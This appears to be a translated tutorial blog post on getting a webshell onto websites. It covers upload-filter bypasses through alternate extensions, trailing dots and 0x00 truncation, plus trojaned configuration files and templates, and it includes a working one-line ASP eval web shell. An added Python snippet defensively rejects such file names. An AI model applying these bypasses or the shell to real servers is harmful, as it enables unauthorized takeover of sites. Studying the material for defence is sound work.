Webshell learning, day two

Four: Getting a webshell by uploading a different file type

(1) This applies when a single server hosts several sites, for example site A is an ASP site and site B may be a PHP site. If site A only restricts uploads of ASP file types, you can try uploading a PHP script to get a shell.

(2) You can also try giving the script file the suffix asa, or adding a [.] directly after the name, as in xx.asp., to get past the upload file-type restriction and obtain a webshell.

Summary: on an ASP website, upload an executable script type such as php or .asa; on a PHP website, upload asp (asp, upload /1.php/.asa, etc.)

Five: Getting a webshell through 00 truncation

Cause of the 00 truncation vulnerability: when the programmer does not strictly filter the file path while writing the upload code, a 0x00 upload truncation vulnerability results. (Assume the upload path is [http://xx.xx.xx.xx/upfiles/lubr.php.jpg]. After capturing the packet, the [.] that follows [lubr.php] is changed to [0x00]. During the upload, the file system treats the name as finished when it reads [0x00], so the [content] of [lubr.php.jpg] is written into [lubr.php], which achieves the purpose of the attack.)

When the 0x00 vulnerability is usable: the data packet must contain the upload directory before it can be used.

Specific measures:

(1) When you upload a file, the website may automatically rename it. In that case you can try capturing the upload data packet and changing the file name to xx.asp%00.jpg, a truncated upload, to get a webshell.

(2) 0x00 is the end-of-string identifier. An attacker can add this identifier manually so that the content after it is cut off, and the content after it can help bypass the check.
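The patterns in sections Four and Five all depend on the server trusting a client-supplied name. The following upload-name check is an added example, not code from the original post; the function names, the image-only allowlist and the sample names are assumptions constructed for illustration.

```python
import uuid
from urllib.parse import unquote

# Assumed policy for this example: an image-only upload endpoint.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
# Script types named in the text; extend for every engine mapped on the host.
SCRIPT_EXTENSIONS = {"asp", "asa", "php"}


def classify(raw_name):
    """Return (extension, None) if the name is acceptable, else (None, reason)."""
    name = raw_name
    for _ in range(3):  # catch %00 and double-encoded %2500
        decoded = unquote(name)
        if decoded == name:
            break
        name = decoded
    if "\x00" in name:
        return None, "NUL byte (0x00 truncation)"
    if any(ord(ch) < 0x20 for ch in name):
        return None, "control character"
    if "/" in name or "\\" in name:
        return None, "path separator"
    if name != name.strip(" ."):
        return None, "leading or trailing dot or space"
    parts = name.lower().split(".")
    if len(parts) < 2:
        return None, "no extension"
    if parts[-1] not in ALLOWED_EXTENSIONS:
        return None, "extension not on allowlist"
    if any(p in SCRIPT_EXTENSIONS for p in parts[1:-1]):
        return None, "script extension inside name"
    return parts[-1], None


def stored_name(raw_name):
    """Build the on-disk name from a random stem; client text never reaches the path."""
    ext, reason = classify(raw_name)
    if ext is None:
        raise ValueError(reason)
    return f"{uuid.uuid4().hex}.{ext}"


# Constructed sample names, modelled on the patterns described in the text.
SAMPLES = ["photo.jpg", "lubr.php.jpg", "xx.asp%00.jpg", "xx.asp.", "1.php/.asa", "php.asa"]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample!r:20} -> {classify(sample)}")
```

Because the stored name is generated on the server and only the allowlisted extension is carried over, a truncated or multi-extension name cannot influence the path that is written. Storing uploads in a directory with script execution disabled covers the shared-server case in section Four.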

Six: Getting a webshell by inserting a trojan into the website configuration

Find the site's default configuration and insert a one-sentence trojan (one-line webshell) into the website configuration. However, for the insertion to succeed, first download the site's source code and check how the source filters input, so that the insertion does not fail.

One-sentence trojan: "%> <% eval request (" cracer ")%> <% '

Seven: Getting a webshell by editing a template

(1) Write the one-sentence trojan into the site by editing a site template, then generate a script file to get a webshell.

(2) Add the trojan to a compressed file, name it as a website template, and upload it to the web server to get a webshell.

Origin www.cnblogs.com/zhangdaoxiang/p/11234694.html